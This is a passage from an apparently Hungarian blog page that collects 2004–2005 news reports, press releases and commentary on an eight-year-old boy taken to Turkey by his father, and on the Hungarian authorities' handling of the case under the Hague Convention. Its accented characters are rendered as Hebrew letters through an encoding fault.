nyםlt levelet adott בt a tצrצk nagykצvetnek, amelyben felhםvtבk a figyelmיt: a gyermekek jogellenes klfצldre vitelיről szףlף hבgai egyezmיny יrtelmיben sokkal hatבrozottabb lיpיseket kellett volna tenni az יdesapja בltal Tצrצkorszבgba vitt nyolcיves magyar gyermek megtalבlבsa יrdekיben.</span></p><p align="center"><strong><span style="font-size:130%;"></span></strong></p><p align="center"><strong><span style="font-size:130%;">A magyar hatףsבgok fיl יve nem adtak ki elfogatףparancsot a Tצrצkorszבgba rabolt kisfiת gyיben</span></strong> </p><p align="center">Inforבdiף - Torda Jתlia/<a href="http://www.pesticivil.hu/hirek/egyhir/469711.html">Pesti Civil</a>, </p><p align="center">2005. januבr 12.</p><p align="justify">Műsorvezető: - A Női יs Gyermekjogi Kצzpont igazgatףja szerint a magyar hatףsבgok tצbb jogszabבlyt is megsיrtettek azzal, hogy fיl יve nem adtak ki nemzetkצzi elfogatףparancsot a Szegedről Tצrצkorszבgba rabolt kisfiת gyיben. Dr. Morvai Krisztina תgy vיli: nem egyedi eset, hogy gyermekrablבst kצvetően az יrintettek az בllamtףl semmilyen segםtsיget nem kapnak. Torda Jתlia interjתja. </p><p align="justify">Dr. Morvai Krisztina, a Női יs Gyermekjogi Kצzpont igazgatףja: - Nincs egy olyan egyttdolgozף team, ahol mindenki tudnב, hogy kinek mi a pontos feladata egy ilyen gyerekeltűnיsi gyben. Szבmos hatףsבg van akinek feladata van az ilyen gyben, feladata van a rendőrsיgnek, feladata van az Igazsבggyi Minisztיriumnak az תgynevezett hבgai egyezmיny alapjבn. Ez a hבgai egyezmיny egy nemzetkצzi egyezmיny a gyermekek jogellenes klfצldre vitelיvel צsszefggő בllami teendőkről. Ennek a felelőse az Igazsבggyminisztיrium. A rendőrsיg felett ugye a Belgyminisztיrium gyakorol felgyeletet. A nemzetkצzi elfogatףparancsokat a Legfőbb gyיszsיg alבrendeltsיgיbe tartozף gyיszsיgek adjבk ki. A gyereknek is joga van ahhoz, hogy az בllandףsבg az יletיben biztosםtva legyen, יs ezt az בllam hבt biztosםtsa יs kikצvetelje. ֱt kell venni az eurףpai uniףs orszבgoknak a tapasztalatבt!</p><p align="justify">R.: - Nבlunk is van egy kormבnyrendelet, ami előםrja, hogy az eltűnt kiskorתak felkutatבsa תgynevezett kiemelt kצrצzיsnek minősl...</p><p align="justify">Dr. Morvai Krisztina, a Női יs Gyermekjogi Kצzpont igazgatףja: - ֽgy van. </p><p align="justify">R.: - ֹs szksיg esetיn nemzetkצzi segםtsיget is kell kיrni, tehבt nemzetkצzi kצrצzיs kiadבsבra is sort kell kerםteni. </p><p align="justify">Dr. Morvai Krisztina, a Női יs Gyermekjogi Kצzpont igazgatףja: - ֽgy van. </p><p align="justify">R.: - Ez ugyanakkor a gyakorlatban mintha nem műkצdne. </p><p align="justify">Dr. Morvai Krisztina, a Női יs Gyermekjogi Kצzpont igazgatףja: - Ez a Szegedről elrabolt יs Tצrצkorszבgba vitt nyolcיves kisfiת vonatkozבsבban fיl יv alatt nem sikerlt kiadni ezt a bizonyos nemzetkצzi elfogatףparancsot, יs a tצrצk hatףsבgok a vבllukat vonjבk יs azt mondjבk hogyha a magyar בllamnak ennyire nem fontos ennek a gyereknek, illetve az őt jogellenesen elvivő יdesapבnak a kיzrekerםtיse, akkor ők nem tudnak nemzetkצzi elfogatףparancs hiבnyבban semmit sem tenni. Tehבt a gyakorlatban ezt tapasztaljuk. </p><p align="justify">R.: - ֹs ez nem is egyedi eset, ha jףl tudom. </p><p align="justify">Dr. Morvai Krisztina, a Női יs Gyermekjogi Kצzpont igazgatףja: - Attףl tartok, hogy nem egyedi eset, hogy az בllamtףl semmilyen segםtsיget nem kap a gyermek, akinek ehhez joga lenne, illetőleg az יdesanya ahhoz, hogy תjra megtalבljבk egymבst. A kיp יs a benyomבs, hogy nincs egy egyיrtelmű szakmai szabבlyrendszer arrףl, hogy milyen haladיktalan nyomozati cselekmיnyeket kell ilyenkor azonnal elvיgezni, mert ugye fיl יvvel kיsőbb mבr nagyon nehיz. Na most amit egy alapםtvבny tehet, azt kיrjk, hogy hasson oda a nyilvבnossבg, hogy az בllami szervek azokat a kצtelessיgeiket, amiket meg kellett volna tenni mבr fיl יvvel ezelőtt, illetőleg az elmתlt hףnapok sorבn, legalבbb most, fיlיv elteltיvel hajtsבk vיgre!</p><p align="center"><strong><span style="font-size:130%;">Magyar-tצrצk klgyi konzultבciף: a tצrצk fיl szerint sem Mehmet Kבroly, sem apja nincs Tצrצkorszבgban</span></strong></p><p align="center">2005. januבr 11. </p><p align="justify">Tצrצkorszבg kיpviselői a hיt elejיn hivatalosan is jeleztיk, hogy nagy erőkkel igyekeznek felkutatni a fיl יvvel ezelőtt Magyarorszבgrףl eltűnt kisfiת, Mehmet Tysz Kבroly hollיtיt - mondta a klgyi szףvivő keddi budapesti tבjיkoztatףjבn. </p><p align="justify">"A tצrצk konzuli delegבciף vezetője megerősםtette azt a korבbbi informבciףt, amely szerint sem a kisfiת, sem pedig יdesapja nem tartףzkodik Tצrצkorszבgban" - kצzצlte Polgבr Viktor. </p><p align="justify">A szףvivő kiemelte: annak ellenיre, hogy a kisfiת eltűnיsיnek gye rendőrsיgi kיrdיs יs elsősorban az Igazsבggyi Minisztיrium kompetenciבjבba tartozik, tיmakיnt szerepelt a hיtfői budapesti magyar-tצrצk konzuli konzultבciףn. </p><p align="justify">"A tצrצk fיl hangsתlyozta, hogy nagy erőkkel igyekeznek felkutatni a kisfiת tartףzkodבsi helyיt יs ennek יrdekיben a tצrצk gyיszsיg, a rendőrsיg יs az idegenrendיszeti hatףsבgok komolyan dolgoznak" - mondta a klgyi szףvivő. </p><p align="center"><strong>*</strong></p><p align="justify"><strong><span style="color:#ff0000;">Efendi kommentבrja:</span></strong></p><p align="justify">Van nיmi differencia a szףvivצ mostani megבllapםtבsa ("<em>a kisfiת eltnיse rendצrsיgi kיrdיs</em>") יs a szףvivצi iroda tavaly augusztus 26-i nyilatkozata kצzצtt (ld. a Raskף Szofi postot a blogon). Utףbbi szerint "<em>A magyar בllampolgבrok alkotmבnyos joga a konzuli vיdelemhez valף jog. A magyar konzuli szolgבlat a klfצldצn bajba kerlt magyar בllampolgבrok megsegםtיse יrdekיben a nemzetkצzi jog יs a hazai jog keretein bell - a fogadף בllam jogבnak tiszteletben tartבsa mellett - intיzkedik. <strong>Kiemelt humanitבrius kצtelezettsיg בll fenn a kiskorת magyar בllampolgבrok vיdelme, a gyermekek jogainak biztosםtבsa, יletk, testi יpsיgk megףvבsa kapcsבn</strong></em>."</p><p align="justify">Nagyobb baj az, hogy az apa - בllםtףlag - elhagyta Tצrצkorszבgot, ahol eddig minden kיtsיget kizבrףan tartףzkodott. </p><p align="justify">Mיg nagyobb baj, hogy nem tudjuk a magyar hatףsבgoktףl, mi is a helyzet tulajdonkיppen. Karcsika anyja jan. 7-יn azt בllםtja, nincs nemzetkצzi kצrצzיs a gyermek apja ellen, egy napilap mבsnap pedig az ellenkezצjיt. Az gyיszsיg - ha nem tיvedek - elצszצr יs utoljבra szeptember 13-בn nyilatkozott, mondvבn: nem indokolt a kצrצzיs. </p><p align="justify">A Nיpszabadsבg nov. 16-בn adta hםrl, hogy a magyar hatףsבgok megtalבltבk azt a hat magyar szemיlyt, akik kצzremkצdtek a kisfiת kijuttatבsבban Tצrצkorszבgba. Vajon a tצlk kapott informבciףk nem voltak elיgsיgesek ahhoz, hogy vבdat emeljenek Karcsika apja ellen vagy nemzetkצzi kצrצzיst adjanak ki ellene? Nem derlt volna talבn ki, hogy a magyar embercsempיszek Tצrצkorszבgban kinek adtבk בt a kisfiתt? Nem kיrhettיk volna azףta a magyar hatףsבgok a tצrצkצket, hogy kihallgassבk az apבt vagy azt a szemיlyt, akinek Karcsikבt בtadtבk? </p><p align="justify">Mi a tיnyleges oka annak, hogy az apa ellen nem adtak ki eddig nemzetkצzi kצrצzיst? (Mבr ha tיnyleg nem adtak ki. Ha meg kiadtak, akkor a fיrfi hogyan hagyhatta el Tצrצkorszבgot?) Nיhבny eltיrצ vיlemיny: A Nיpszabadsבg szept. 13-i םrבsa szerint "<em>a Csongrבd Megyei Rendőr-főkapitבnysבg םrבsban kצzצlte lapunkkal, hogy ... eltűntkיnt itthon יs klfצldצn is kצrצztettיk a kisfiתt, egyתttal kiskorת elhelyezיsיnek megvבltoztatבsביrt az apבt is... A megyei főkapitבnysבg ...annak idejיn előterjesztיst tettek a vבrosi gyיszsיgnek: adjanak ki nemzetkצzi elfogatףparancsot az apa ellen. A Szegedi Vבrosi gyיszsיg azonban <strong>nem tette</strong>, בllבspontja szerint ugyanis "a hatבlyos nemzetkצzi szerződיsek rendelkezיsei szerint <strong>hazahozatalukra ezek alapjבn nem lenne mףd</strong>". Tצrő Sבndor megyei főgyיszhelyettes szerint a Szegedi Vבrosi gyיszsיg helyesen jבrt el. Az apבnak tulajdonםtott bűncselekmיnyt a tצrvיny egy יv szabadsבgvesztיssel fenyegeti, azaz <strong>nem olyan sתlyת bűntיnyről van szף, amely nemzetkצzi elfogatףparancs kiadבsבt</strong> <strong>indokolnב</strong>. " </em></p><p align="justify">Szף, ami szף, nem tתl meggyצzצ יrvelיs, תgy lבtszik, a "kiemelt humanitבrius kצtelezettsיget" lehet mבskיnt is יrtelmezni.</p><p align="justify">ֹs most, hogy a magyar-tצrצk בllampolgבrsבgת apa elhagyta Tצrצkorszבgot, ki fogja צt megtalבlni, ha nincs ellene nemzetkצzi elfogatףparancs? Vagy mיgiscsak ki fogjבk azt adni? De akkor miיrt nem tettיk hףnapokkal ezelצtt?</p><p align="justify">Az idיzett cikk azt םrja, hogy Tצrצ fצgyיszhelyettes szerint "<em>a jelenlegi helyzetben az Igazsבggyi Minisztיriumon keresztl intיzhető a leggyorsabban Karcsika sorsa</em>". Vajon most is םgy gondolja a fצgyיszhelyettes?</p><p align="justify">A sokszor emlegetett hבgai egyezmיny szerint a gyermek jogellenes klfצldre vitelיtצl szבmםtott egy יven bell intיzhetצ a visszaadבs a hבgai egyezmיny alapjבn, a 366. naptףl mבr a - tצrצk - csalבdjogi bםrףsבg dצnt a gyermek elhelyezיsיrצl. Ha a gyermek mבr egy יve az apבnבl lesz, kצnnyen lehet, hogy a bםrףsבg a gyermek יrdekיre hivatkozva nבla is fogja a kisfiתt elhelyezni, mondvבn, az elmתlt יvben ezt a helyzetet szokta meg.</p><p align="justify">Szףval, a dolgok rosszabbul בllnak, mint amikor mיg a magyar hatףsבgok megprףbבlhattבk volna elיrni Mehmet Karcsika apjבnak kihallgatבsבt az embercsempיszיsi gyben Isztambulban.</p><p align="justify">Azיrt jף hallani, hogy "Az [origo] בltal megkיrdezett minisztיriumok בllםtjבk, komoly erőfeszםtיseket tesznek az gyben". </p><p align="justify">Talבn majd egyszer az gyיszsיg meg mבsok is tבjיkoztatjבk a kצzvיlemיnyt azok mibenlיtיrצl.</p><p align="justify">Ajבnlott cikk - <a href="http://euroastra.hu/cgi-bin/index.cgi?page=showart&sid=QYJJSANMHHSTXBKW&amp;id=4667">Kis Jבnos: Ki a felelős?</a> EuroASTRA internet magazin, 2005. jan. 9. </p><p align="center"><br /><span style="font-size:130%;"><strong>Nyom nיlkl Tצrצkorszבgban</strong></span><br />Nיpszabadsבg • Varrף Szilvia • 2005. januבr 8. </p><p align="justify"><strong><em>Az apa az anya tudta nיlkl vitte Tצrצkorszבgba a kisfiתt. Tavaly jתlius ףta senki nem tudja, hol van Karcsika.</em><br /></strong><br />Trpz Mehmet Kבroly jצvő vasבrnap lesz nyolcיves. ֹdesanyja jתlius 11-יn lבtta utoljבra: papucsot, frdőruhבt pakolt be neki az apja kיrיsיre. A megbeszיlt időre azonban a tצrצk-magyar בllampolgבrsבgת apa nem hozta vissza Karcsikבt az יdesanyבhoz, akinיl a bםrףsבg elhelyezte.<br /><br />- Amikor felhםvtam a volt יlettבrsam, a mobilja mבr ki volt kapcsolva. Pבr ףrבval kיsőbb jelentkezett Tצrצkorszבgbףl: ha nem fordulok a rendőrsיghez, szeptemberben visszahozza Karcsikבt. De bejelentיst tettem - mondja Bogosnי Pap Edina.<br /><br />A kisfiת az יdesanya szerint Tצrצkorszבgban van, a tצrצk hatףsבgok azonban nem biztosak ebben. Egy dolgot elיg gyorsan kiderםtettek a magyar hatבrőrצk: Karcsika egy mבsik, vele egyidős kisfiת nevיre kiבllםtott, de sajבt arckיpes תtlevיllel lיpett be Tצrצkorszבgba, majd mיg aznap ki is lיpett onnan. Ezen tתl minden bizonytalan: az יdesanya szerint a bntető-, יs a polgבrjogi eljבrבs is lassan halad. Morvai Krisztina, a Női- יs Gyermekjogi Kutatף יs Oktatף Kצzpont vezetője egyetיrt Edinבval abban, hogy az בllami mulasztבsok sorozata tצrtיnt, a magyar hatףsבgok munkבja mind ez idבig nem volt צsszehangolt, יs בltalבban sincs egy vilבgos menetrendjk arra az esetre, ha egy gyermek eltűnik.<br /><br />Az בltalunk megkeresett hatףsבgok ezt visszautasםtjבk: szerintk erőn fell teljesםtettek az gyben, a gyereket viszont csak a tצrצk hatףsבgok tudjבk megtalבlni. Akik keresik is, de egyelőre sem az apבt, sem Karcsikבt nem talבljבk, a nagyapa pedig az gyיszsיgen azt mondta: hבrom יve nem lבtta unokבjבt.<br /><br />gyיszsיgi informבciףk szerint hamarosan vבdemelיs lesz kiskorת elhelyezיsיnek megvבltoztatבsa יs embercsempיszיs gyיben. Nemzetkצzi elfogatףparancsot adtak ki Karcsika יdesapja ellen. Az יdesanya szerint a vonatkozף nemzetkצzi egyezmיny ismeretיben יrthetetlen, miיrt kיslekednek a tצrצk hatףsבgok: miיrt nem hoztak mבr hatבrozatot Karcsika hazahozatalבrףl, יs miיrt nem rבmenősebb a magyar igazsבggy a tצrצkצkkel szemben. Brבvבcz Ottףnי, az igazsבggyi tבrca nemzetkצzi magבnjogi főosztבlyבnak vezetője szerint az יdesanya olyan feladatokat kיr szבmon a tבrcבn, amelyek kםvl esnek lehetősיgeiken. A tצrצk hatףsבgoknak mindenekelőtt azt kell megבllapםtaniuk, hogy a gyermek tיnyleg ott tartףzkodik-e. - Nincs okunk, sem jogunk feltיtelezni, hogy a tצrצk hatףsבgok ne tennיnek meg mindent a felkutatבsa יrdekיben - mondta.<br /><br />Ha Karcsikבt megtalבljבk, visszaadבsa a Hבgai Egyezmיny szerint sem automatikus: arrףl bםrףsבg dצnt, amelyet az apa megfellebbezhet.<br /><br />A magyar igazsבggyi tבrca legutףbb december 23-בn tudakolta a tצrצk hatףsבgoktףl, milyen tovבbbi intיzkedיseket terveznek, hogy megtalבljבk a gyermeket - vבlaszt egyelőre mיg nem kaptak.<br /><br />Lapunk megkereste a magyarorszבgi tצrצk nagykצvetsיget, lapzבrtבnk idejיn vבlaszt mיg nem kaptunk.</p><p align="center"><span style="font-size:130%;"><strong></strong></span></p><p align="center"><span style="font-size:130%;"><strong>Jogvיdő hבborת egy kisfiת kצrl</strong></span></p><p align="center"><a href="http://www.origo.hu/itthon/20050107jogvedo.html">origo, 2005. januבr 7.</a></p><p align="justify"><em><strong>A mai napig nem kerlt vissza יdesanyjבhoz az a nyolc יves kisfiת, akit יdesapja fיl יvvel ezelőtt hamis תtlevיllel csempיszett ki Tצrצkorszבgba. Az anya יs egy jogvיdő civil szervezet szerint a magyar kormבny nem tesz meg mindent a kisfiת hazakerlיse יrdekיben, rבadבsul cselekvיsi terve sincs hasonlף esetekre. A Belgy- יs az Igazsבggyi Minisztיrium בllםtja: komoly erőfeszםtיseket tesznek az gyben. A kisfiת megtalבlבsa azonban a tצrצk rendőrsיg feladata, visszaadבsבrףl pedig csak a tצrצk bםrףsבg dצnthet.</strong></em></p><p align="justify">"Nincsen cselekvיsi terve a kormבnynak arra az esetre, ha egy magyar kisfiתt klfצldre csempיsznek" - jelentette ki pיnteki sajtףtבjיkoztatףjבn Morvai Krisztina, a Női יs Gyermekjogi Kצzpont vezetője. A jogvיdő civil szervezet azt kifogבsolta, hogy a mai napig nem kerlt vissza az יdesanyjבhoz Tysz Mehmet Kבroly, az a nyolc יves kisfiת, akit יdesapja fיl יve csempיszett ki Tצrצkorszבgba.</p><p align="justify">A bםrףsבg korבbban az anyבnak םtיlte a gyermeket, a tצrצk-magyar בllampolgבrsבgת apa azonban 2004 jתliusבban a lבthatבs utבn nem vitte haza a kisfiתt, hanem hamis תtlevיllel Tצrצkorszבgba vitte magבval. Az anyבnak azףta semmilyen informבciףja nincs a kisfiתrףl.</p><p align="justify">Morvai Krisztina elmondta: a kormבnytףl azt vבrjבk, hogy a belgyi, a klgyi יs az igazsבggyi tבrca, valamint a legfőbb gyיsz alakםtson munkacsoportot annak יrdekיben, hogy a kisfiת minיl előbb hazakerljצn. Ennek יrdekיben az anya יs a civil szervezet decemberben nyםlt levelet is intיzett az יrintett tבrcבkhoz, erre semmifיle vבlaszt nem kaptak. Morvai kifogבsolta azt is, hogy a magyar hatףsבgok mיg nemzetkצzi elfogatףparancsot sem adtak ki az apa ellen.</p><p align="justify">A Női יs Gyermekjogi Kצzpont szerint az gy megoldבsבt az sem segםtette, hogy mind Magyarorszבg, mind pedig Tצrצkorszבg csatlakozott a "jogellenesen klfצldre vitt gyermek visszaadבsבrףl" szףlף nemzetkצzi egyezmיnyhez. Az egyezmיny יrtelmיben ugyanis a magyar kormבny kיrיse utבn hat hיten bell haza kellett volna kerlnie a kisfiתnak. Az anya, Bogosnי Papp Edina a sajtףtבjיkoztatףn elmondta: a tצrצk hatףsבgok segםtőkיszek, hiבnyoljבk azonban a magyar kormבny hatבrozott fellיpיsיt.</p><p align="justify">Az [origo] בltal megkיrdezett minisztיriumok viszont בllםtjבk, komoly erőfeszםtיseket tesznek az gyben. Orodבn Sבndor, a Belgyminisztיrium szףvivője elmondta: Somogyi Ferenc klgyminiszter novemberi tצrצkorszבgi lבtogatבsakor szemיlyesen lיpett fel a kisfiת mielőbbi hazakerlיsnek יrdekיben. A kicsempיszיs kצrlmיnyeit pedig a hatבrőrsיg nyomozףi derםtettיk fel - kצzצlte Orodבn.</p><p align="justify">Dr. Brבvבcz Ottףnי, az Igazsבggyi Minisztיrium (IM) nemzetkצzi jogבsza elmondta: a kisfiתt csak tצrצk hatףsבgok kutathatjבk fel, a nemzetkצzi egyezmיny alapjבn ugyanis azon orszבg hatףsבgainak kell gondoskodniuk a klfצldre vitt gyermek megtalבlבsבrףl, ahovב a gyereket elvittיk. A gyermek visszaadבsבrףl pedig csak az ottani bםrףsבg dצnthet - kצzצlte. A minisztיrium abban tud segםteni az anyבnak, hogy biztosםtja a jogi kיpviseletיt a tצrצk bםrףsבgon.</p><p align="justify">Az igazsבggyi tבrca folyamatos kapcsolatban בll a tצrצk igazsבggyi minisztיriummal. A tצrצk rendőrsיg pedig jelenleg is keresi a kisfiתt, ami nem egyszerű feladat, mivel a hatףsבgoknak sajnos egyelőre nincs informבciףjuk a nyolc יves gyerek hollיtיről.</p><p align="justify">--------------------------------------------------------------------</p><p align="justify"><a href="http://www.ajk.elte.hu/KarSzervezete/Alkalmazottak/223182012.html">Kicsoda dr. Morvai Krisztina?</a></p><p align="justify"><a href="http://www.sulinet.hu/tart/cikk/de/0/11342/1">Beszיlgetיs dr. Morvai Krisztina, bntetőjogבsszal</a> - (nemcsak Tצrצkorszבgban problיma a csalבdon belli erőszak)</p><p align="justify"><strong>Női יs Gyermekjogi Kutatף Kצzpont Alapםtvבny</strong> (aki ismeri a weblap cםmיt, kיrem, kldje meg!)</p><p align="justify"><a href="http://www.nane.hu/">NANE (Nők a Nőkיrt Egytt az Erőszak Ellen) Egyeslet</a></p><p align="justify"><a href="http://www.nane.hu/linkek/index.html">Nők יs gyermekek jogaival kapcsolatos linkek</a></p><p align="center"><span style="font-size:130%;"><strong>A Klgyminisztיrium szףvivői irodבjבnak kצzlemיnye</strong></span></p><strong><span style="font-size:130%;"></span></strong><p align="justify"><em>Budapest, 2005. januבr 7., pיntek (OS) - Az Orszבgos Sajtףszolgבlat az alבbbi kצzlemיny kiadבsבra kapott felkיrיst:</em></p><p align="justify">A gyermekek elvitelיvel kapcsolatos gyekben a vonatkozף hבgai egyezmיny alapjבn a Klgyminisztיrium nem rendelkezik elsődleges hatבskצrrel. A minisztיrium ugyanakkor Mehmet Tysz Kבroly 2004. jתlius 11-i eltűnיse ףta minden rendelkezיsיre בllף eszkצzzel kצzreműkצdik a gyermek mielőbbi felkutatבsבban יs יdesanyjבhoz tצrtיnő visszajuttatבsבban. </p><p align="justify">A Klgyminisztיrium konzuli יs igazsבggyi főosztבlya, az ankarai magyar nagykצvetsיg יs az isztambuli főkonzulבtus a hivatalos informבciףk haladיktalan tovבbbםtבsבval segםtik az gyben elsődleges hatבskצrrel eljבrף magyar hatףsבgok - a rendőrsיg, az gyיszsיg, a hatבrőrsיg, valamint az Igazsבggyi Minisztיrium - munkבjבt, valamint folyamatosan srgetik a tצrצk kצzponti יs helyi hatףsבgok intיzkedיsיt. A megtett lיpיsekről, az gy fejlemיnyeiről Bogosnי Papp Edinבt, a gyermek יdesanyjבt rendszeresen tבjיkoztatjuk.</p><p align="justify">Az gy legutףbbi fejlemיnyeihez tartozik, hogy Somogyi Ferenc klgyminiszter 2004. november 28-30. kצzצtt lezajlott ankarai hivatalos lבtogatבsבn szemיlyesen is kצzbenjבrt tצrצk partnereinיl, kיrve, hogy haladיktalanul tegyenek meg mindent a gyermek mielőbbi felkutatבsa יs visszatיrיse יrdekיben.</p><p align="justify">ֱtיrezve az יdesanya fבjdalmבt, a Klgyminisztיrium az elkצvetkezőkben is figyelemmel kםsיri az gy alakulבsבt, יs segםti az יdesanyבt gyermeke hazajuttatבsבban. Ennek jegyיben a kצzeljצvőben sorra kerlő magyar-tצrצk konzuli konzultבciף napirendjיn kיrיsnkre szerepelni fog Mehmet Kבroly gye is.</p><p align="center"><span style="font-size:130%;"><strong>Hogyan tűnhet el nyomtalanul egy nyolcיves gyerek יs miיrt tűri ezt a magyar בllam?</strong></span> </p><p align="justify"><em><strong>Orszבgos Sajtףszolgבlat, Budapest, 2005. januבr 6.</strong></em> - Hogyan tűnhet el nyomtalanul egy nyolcיves gyerek יs miיrt tűri ezt a magyar בllam? cםmmel sajtףtבjיkoztatףt tart pיnteken a fיl יve Szegedről elrabolt יs szervezett bűnצzők בltal Tצrצkorszבgba csempיszett kisfiת יdesanyja יs a Női יs Gyermekjogi Kצzpont Alapםtvבny.</p><p align="justify">A miniszterelnצknek, a Legfőbb gyיsznek, a Belgy- יs az Igazsבggy-miniszternek, s tovבbbi בllami vezetőknek םrott nyםlt levelיben az anya magyarבzatot vבr arra, miיrt nem adtבk ki mind a mai napig a nemzetkצzi kצrצzיst יs mit ףhajt tenni a magyar בllam sajבt elveszett בllampolgבrבnak, egy kisgyermeknek a felkutatבsבra. A sajtףtבjיkoztatף a Centrבl kבvיhבz galיriבjבn lesz januבr 7-יn pיnteken 11 ףrakor. (Kiadף: Női יs Gyermekjogi Kutatף יs Oktatף Kצzpont)</p><p align="center"><span style="font-size:130%;"><strong>Tצrצkorszבgba hurcolt kisfiתrףl tבrgyalt a magyar klgyminiszter</strong></span></p><p align="justify"><strong>MTI, 2004. november 30.</strong> - <em>A tצrצk klgyminiszter remיnyei szerint hamarosan megoldףdhat a nyבron anyja akarata ellenיre Tצrצkorszבgba hurcolt Tysz Mehmet Kבroly gye. A magyar kisfiת sorsבrףl Somogyi Ferenc klgyminiszter tבrgyalt Ankarבban.</em></p><em></em><p align="justify">Az anyja akarata ellenיre nyבron Tצrצkorszבgba vitt magyar kisfiת gyיt is felvetette Somogyi Ferenc klgyminiszter Ankarבban, amikor tצrצk partnerיvel, Abdullah Gllel tבrgyalt. A tצrצk klgyminiszter vבlasza szerint "lיpיseket tettek" a kiskorת Tysz Mehmet Kבroly felkutatבsa יrdekיben. Gl bםzik az gy kedvező kimenetelיben. A hיt יs fיl יves kisfiתt tצrצk בllampolgבrsבgת apja mיg a nyבron az anya, Papp Edina akarata ellenיre Szegedről Tצrצkorszבgba vitte, majd arra kיrte az asszonyt, mondjon le a gyermekről. A szegedi rendőrkapitבnysבg augusztusban indםtott nyomozבst az gyben. A kisfiת hollיtיről azףta sincs biztos informבciף.</p><p align="justify">Polgבr Viktor utalt egy kצzelmתltbeli hasonlף esetre, amikor a hבromיves Raskף Szofi יs יdesanyja, Raskף Emese hazatיrיsi igazolvבnyuk ellenיre augusztustףl oktףberig nem jצhettek vissza Tצrצkorszבgbףl, יs kיt hףnapot az ankarai magyar nagykצvetsיgen tצltצttek. A szolnoki kislבnyt az יv elejיn tצrצk בllampolgבrsבgת apja szintיn az יdesanya tudomבsa יs engedיlye nיlkl vitte Tצrצkorszבgba.</p><p align="center"><br /><strong><span style="font-size:130%;">ֱlszlők segםtettיk gyermeke kiszצktetיsיben a tצrצk apבt</span></strong></p><p align="center"><em><strong>Fekete Gy. Attila, Nיpszabadsבg, 2004. nov. 16.</strong></em></p><p align="justify"><em>Krimibe illő mףdon csempיsztette ki az orszבgbףl egy tצrצk fיrfi a hיtיves kisfiבt, akit a magyar bםrףsבg az יdesanyjבnבl helyezett el. A szיkesfehיrvבri hבzaspבr sajבt gyerekיnek mondta Mehmet Karcsikבt.<br /></em><a href="http://ad.adverticum.net/click.prm?zona=18213" target="_top"></a><br />Mikיnt lapunk is beszבmolt rףla: a hיt- יves Mehmet Kבrolyt jתlius 10-יn tצrצk יdesapja, Tysz Mehmet (31) nem vitte vissza a lבthatבsrףl יdesanyjבnak, akinיl a bםrףsבg jogerős vיgzיsיvel elhelyezte. Mבsnap Tצrצkorszבgbףl hםvta fel az asszonyt, hogy a gyerek vele van, s ha nem szףl a rendőrsיgnek, idővel talבn mיg lבthatja. Kיsőbb tצrצk gyvיdje az isztambuli magyar konzulבtus תtjבn kיrte volna a kisfiת iskolai iratainak kikldיsיt. Kיrיsיt a konzulבtus megtagadta. Abban azonban mבr nem segםtett a konzulבtus az יdesanya בltal felfogadott Sבndor Istvבn nyugalmazott rendőr alezredesnek, hogy rיgi tצrצk kapcsolatainak segםtsיgיvel "hazalopja" a gyermeket. A kיtsיgbeesett anyבnak azt tanבcsoltבk, a magyar Igazsבggyi Minisztיriumon keresztl kיrje a tצrצk hatףsבgok segםtsיgיt.</p><p align="justify">Kezdettől kיrdיses volt, hogyan vihette gyermekיt klfצldre תtlevיl יs az anya tudta nיlkl az elvבlt fיrj?</p><p align="justify">A Hatבrőrsיg Kiskunhalasi Igazgatףsבga bűngyi felderםtő osztבlyבnak nyomozףi a tצrtיntek ףta kiderםtettיk: Tysz Mehmet hetekkel a kisfiת megszצktetיse előtt megbםzott el algyői fיrfit, kerםtsen egy csalבdot, amelynek a fiביval azonos korת fiתgyermeke van, יs pיnzיrt hajlandףk segםteni, hogy Karcsikבnak "hamis תtlevelet" kיszםttessenek. Az illető azonban tovבbbadta a megbםzבst egy dunaתjvבrosi ismerősיnek, aki (miutבn nem talבlt a feladatra alkalmas csalבdot) megbםzta a feladattal egy szיkesfehיrvבri barבtjבt, aki egy mבsik szיkesfehיrvבri fיrfinak tovבbbםtotta a megrendelיst. Vיgl ő talבlta meg a szintיn szיkesfehיrvבri hבzaspבrt, akik vבllaltבk: sajבt gyermekk szletיsi anyakצnyvi kivonatבval יs Mehmet Karcsika fotףjבval elmennek a helyi okmבnyirodבba, יs benyתjtjבk az תtlevיlkיrelmet. Miutבn az igיnylיs szabבlyos volt, a kיt szlő szemיlyesen יs egybehangzףan nyilatkozott, hogy a fotףn lבthatף fiת az ő gyermekk, s minden szksיges iratot benyתjtottak, az okmבnyiroda elkיszםttette a hamis adatokat tartalmazף תtlevelet.</p><p align="justify">Jתlius 10-יn Karcsika, az תtlevelיhez a nevיt adף בlיdesapjבval, az יdesapja בltal megbםzott algyői kapcsolattartףval יs annak barבtnőjיvel elhagyta az orszבgot.</p><p align="justify">A hatבrőrsיg embercsempיszet megalapozott gyanתjבval folytatja az eljבrבst a kisfiת Tצrצkorszבgba szצktetיsיben kצzreműkצdő hבlףzat hat tagja ellen.</p><p align="justify"><strong>LINK: <a href="http://www.mkogy.hu/irom37/11350/11350.pdf"><span style="font-size:130%;">Tףth Gבbor orszבggyűlיsi kיpviselő kיrdיse a belgyminiszterhez (2004. szeptember 13.)</span></a></strong></p><p align="center"><br /><span style="font-size:130%;"><strong>"Nem olyan sתlyת bűntיny"</strong><br /><strong>Hףnapokig tarthat Mehmet Kבroly hazahozatala</strong></span></p><div align="center"><strong>Fekete Gy. Attila, Nיpszabadsבg, 2004. szept. 13.</strong></div><div align="justify"><span style="font-size:130%;"><br /></span></div><div align="justify"><span style="font-size:100%;"></span></div><div align="justify">A tצrצk bםrףsבgnak kell majd dצntenie a hיt יs fיl יves Mehmet Kבroly visszaadבsבrףl, akit יdesanyja tudta nיlkl vittek Tצrצkorszבgba.</div><div align="justify"><br />Kedden beszבmoltunk a hיt יs fיl יves Mehmet Kבroly kבlvבriבjבrףl, akit יdesanyja tudta יs beleegyezיse nיlkl, miden jel szerint egy meghamisםtott תtlevיllel vitt Tצrצkorszבgba יdesapja Tysz Mehmet (31). Amikor a szlők elvבltak, a bםrףsבg az anyבnak םtיlte a gyermeket, az apa azonban a jתlius 10-i lבthatבs utבn nem vitte vissza a megbeszיltek szerint. Mבsnap Tצrצkorszבgbףl telefonבlt: "ha lemond a fiבrףl, יs nem fordul a rendőrsיghez, nem lesz semmi baj". A csalבd יs kיrיskre a gyermek felkutatבsבban segםtsיgkre siető Sבndor Istvבn nyugalmazott alezredes, akit mבs gyek kapcsבn, Papa fedőnיven ismerhetett meg a kצzvיlemיny, kצzvetlenl az eset utבn kצzצltיk a sajtףval: a rendőrsיg előbb csak Magyarorszבgon kצrצztette a kisfiתt, mivel ők 